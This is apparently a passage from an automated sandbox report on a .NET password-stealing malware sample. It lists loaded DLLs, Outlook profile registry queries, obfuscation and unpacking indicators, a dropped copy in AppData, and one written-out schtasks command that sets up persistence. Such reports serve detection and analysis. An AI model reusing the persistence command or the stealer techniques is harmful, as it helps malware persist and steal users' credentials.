                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeSection loaded: vaultcli.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeSection loaded: windowscodecs.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dll
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeSection loaded: mscoree.dll
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeSection loaded: kernel.appcore.dll
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeSection loaded: version.dll
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeSection loaded: uxtheme.dll
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeSection loaded: windows.storage.dll
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeSection loaded: wldp.dll
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeSection loaded: profapi.dll
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeSection loaded: cryptsp.dll
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeSection loaded: rsaenh.dll
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeSection loaded: cryptbase.dll
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeSection loaded: wbemcomn.dll
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeSection loaded: amsi.dll
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeSection loaded: userenv.dll
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeSection loaded: sspicli.dll
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeSection loaded: vaultcli.dll
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeSection loaded: wintypes.dll
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeSection loaded: iphlpapi.dll
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeSection loaded: dnsapi.dll
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeSection loaded: dhcpcsvc6.dll
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeSection loaded: dhcpcsvc.dll
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeSection loaded: winnsi.dll
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeSection loaded: mswsock.dll
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeSection loaded: rasadhlp.dll
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeSection loaded: fwpuclnt.dll
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
                      Source: SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                      Data Obfuscation

                      barindex
                      .NET source code contains potential unpacker
                      Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe.5630000.10.raw.unpack, LoginForm.cs.Net Code: System.Reflection.Assembly.Load(byte[])
                      Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe.5f50000.13.raw.unpack, DbTxFVYqKJRHOfF5An.cs.Net Code: RmQu9xImOq System.Reflection.Assembly.Load(byte[])
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeCode function: 9_2_06803AD3 push ebx; retf 9_2_06803ADA
                      Source: SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeStatic PE information: section name: .text entropy: 7.924266151976974
                      Source: TuZRpLi.exe.0.drStatic PE information: section name: .text entropy: 7.924266151976974
                      Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe.5f50000.13.raw.unpack, h9XgJUrxZvKDBIOq0uq.csHigh entropy of concatenated method names: 'VeYLCNNu9W', 'MvVLoMT1Hp', 'O9dL9oHIaT', 'JWXLAPNcA7', 'KYZLfkTbaQ', 'EapLVWp47q', 'DjNL7ri8HE', 'BbbLR7vPYo', 'uUiLxT0FoZ', 'sbBLe8wfs2'
                      Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe.5f50000.13.raw.unpack, jnOEI4PSUDb1Xcqy8J.csHigh entropy of concatenated method names: 'GgEqlesy3j', 'BoOqn1g6Mo', 'sKCqKLgPlt', 'dIcqU6aIW8', 'FcJq4wYJZg', 'UJkq1d6ufp', 'tYRqZ5pmST', 'NLvqO14TCe', 'CBdq5VRVDQ', 'IXsqMnyEJS'
                      Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe.5f50000.13.raw.unpack, Ics5XOqDoJJfpkWswl.csHigh entropy of concatenated method names: 'FIiT8cYOKL', 'sgoTtYIAcm', 'oeOTl5YB74', 'tE6TnACnhu', 'qD5THq6QvE', 'IB4TwIqn0M', 'STmTmY9pPA', 'IgUTGp9Oca', 'lTxTicXyrA', 'JDHTNnZBHj'
                      Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe.5f50000.13.raw.unpack, lZ8uWIRiVRTulY9dLy.csHigh entropy of concatenated method names: 'iuAaA5vhp4', 'asaaV06jBc', 'cqpaR4BFWX', 'DDBaxepNou', 'KWlaTTuRwU', 'wFVavLYnER', 'W9PaB6lkRP', 'Oyfast38cl', 'RuaaLJaSdK', 'HWaaYayDpc'
                      Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe.5f50000.13.raw.unpack, IFfuPum6ed2mwOL3Oc.csHigh entropy of concatenated method names: 'NlJE2QIIq0', 'ydrEaSKRtL', 'JItEXIWdg9', 'gR4XMt8XVe', 'R6WXzwuaEq', 'qQkErgx2Ny', 'mQvEyAJ5wf', 'QCuEdEjTjL', 'VxKEIY4Vs4', 'UGfEugtnnI'
                      Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe.5f50000.13.raw.unpack, ptkcvFyIko6Vgai0Cp.csHigh entropy of concatenated method names: 'Dispose', 'V06y5dbVyU', 'aDVdHLc4MJ', 'bRoggPOmFk', 'jiIyMcXpEx', 'Co5yzvjIu9', 'ProcessDialogKey', 'glwdrgb4y9', 'cN5dycKlCr', 'MLtddvUMgZ'
                      Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe.5f50000.13.raw.unpack, ji4bRcgHPp3YBF6N9F.csHigh entropy of concatenated method names: 'qpD9sZ9KC', 'WpPA1mwuv', 'LoOVgO7jr', 'ekv7eokRp', 'vCBxMOJj7', 'QWjeLQUwx', 'KQ1QkhZkcXb2yP09Bv', 'umGo9UYu9c2NYtlQ4N', 'OENM0Z4IMM8CDSR8W5', 'hAPs3jEc8'
                      Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe.5f50000.13.raw.unpack, j3kliHIVm29aEbcWo1.csHigh entropy of concatenated method names: 'XHGLy8MKyl', 'j1wLIuFdjS', 'nufLuEL64M', 'DBNL2uhJkh', 'vcZLqo8cQE', 'KGqLFcTJTi', 'GYNLXqpLdi', 'xtPsZZON4L', 'W8NsOe3aeu', 'zH6s5wEcYJ'
                      Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe.5f50000.13.raw.unpack, ts9UdaXrsaOaskEftJ.csHigh entropy of concatenated method names: 'qYUECFwG08', 'Ep5EoP4xKQ', 'pExE9fY1n7', 'X6CEAMCRlo', 'eaGEfeERJn', 'RAsEVY7L6L', 'v5NE7nf9ut', 'e6OERfv1LC', 'ibaExjpxRZ', 'jl8EeamHgh'
                      Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe.5f50000.13.raw.unpack, AcyZefjYCPiKQdGsR0.csHigh entropy of concatenated method names: 'KVZmuADUuHKGHnfsPfZ', 'mPq2k3DmKsFiC9gnVeS', 'OdKg8uDRndJ7E6Uh9Nx', 'ReFXsFQkpj', 'QWRXLWx4PM', 'LkZXYMbWGY', 'my3GkAD8tpQPBCZlueZ', 'yKqKGVDMqyXTgJYrCR7'
                      Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe.5f50000.13.raw.unpack, tvt69rzvv6M3FNEJWt.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'rXBLhWx9rx', 'TwcLTJEJrr', 'QRELvXn6QZ', 'Q2TLBu1a3m', 'uA5LsAaRhm', 'liDLLZMmGc', 'M99LYdAX15'
                      Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe.5f50000.13.raw.unpack, WsjDAefL2e2kyOUtBN.csHigh entropy of concatenated method names: 'gk1yE04rq8', 'GKSykPATOc', 'bxJy6A1fxl', 'GO8ypevUBs', 'fAhyTgqTss', 'EY9yveQx92', 'wg9YLqna6WJAeZQLYp', 'v8062R1PobDYoabXxR', 'dNQyyxwkXZ', 'cRJyIjPaHs'
                      Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe.5f50000.13.raw.unpack, cb0g1JuRiZN1xmB927.csHigh entropy of concatenated method names: 'M9Ss2aBLSi', 'oUKsq5aSQF', 'up1saiTEG1', 'AecsFxN2XN', 'fjqsXAA400', 'daCsEW02br', 'IbEskfvpxJ', 'HCnsP6mBjl', 'GThs6rMmLW', 'pbIspU0YTh'
                      Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe.5f50000.13.raw.unpack, Y5nytErNmFIcW1ufM2F.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'OOtYlDLUpE', 'N1CYnlbLKR', 'Gr1YKZPLGn', 'XJmYUoVMBU', 'gyMY4VWO9T', 'JxyY10pIdk', 'BkXYZV6wDM'
                      Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe.5f50000.13.raw.unpack, tLiBjXBKlgE4d1KknX.csHigh entropy of concatenated method names: 'mqlBOqN81O', 'g3DBMOmAFC', 'clvsrmDmCI', 'cvcsy3VOCA', 'YcaB0oXD4u', 't5fBtigCxI', 'isEBJsQlrv', 'c8WBlpuo1l', 'BaUBnv0NKM', 'irXBK28YwL'
                      Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe.5f50000.13.raw.unpack, DbTxFVYqKJRHOfF5An.csHigh entropy of concatenated method names: 'nwbIQGyo4e', 'ipQI2WIQdS', 'AbKIqxXIe5', 'JElIaG74qI', 'bb6IFTMsdQ', 'kwuIXBxCl1', 'byYIETP6kg', 'kWCIk4lXT8', 'BBhIP5JBMr', 'QnQI6M8NGR'
                      Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe.5f50000.13.raw.unpack, nt04Z5alfSFmOHTce1.csHigh entropy of concatenated method names: 'ytkXQnG7s9', 'ohXXqbtpiA', 'DCdXFrVE2w', 'naZXEcOQIF', 'ua7XkgaoIR', 'eEOF4muobX', 'fWxF1E0Ql1', 'QExFZU9E96', 'PECFOEO9kw', 'RvKF5dxgUt'
                      Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe.5f50000.13.raw.unpack, MCy3qtL8rVBoDnGdwB.csHigh entropy of concatenated method names: 'RT2hROLFep', 'ToAhxEMG4K', 'Jcwh3dmTe7', 'XbQhHFVoei', 'wJihmw09Dd', 'x6BhGhtLE7', 'uynhN4bT3L', 'ffphWkW3bP', 'rTSh8J8mq3', 'sI6h0eP3lD'
                      Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe.5f50000.13.raw.unpack, dpETEbKfXc5dam4FjF.csHigh entropy of concatenated method names: 'AOJB60pD2C', 'JQMBpIWQUt', 'ToString', 'u5LB2pyRYF', 'ySyBqwCRMN', 'mZqBaLbB2v', 'fPMBFOtl1q', 'RrwBXCs1Rw', 'vbUBEmJfqy', 'CGNBkDoEGG'
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeFile created: C:\Users\user\AppData\Roaming\TuZRpLi.exeJump to dropped file

                      Boot Survival

                      barindex
                      Uses schtasks.exe or at.exe to add and modify task schedules
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TuZRpLi" /XML "C:\Users\user\AppData\Local\Temp\tmp8319.tmp"

                      Hooking and other Techniques for Hiding and Protection

                      barindex
                      Loading BitLocker PowerShell Module
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
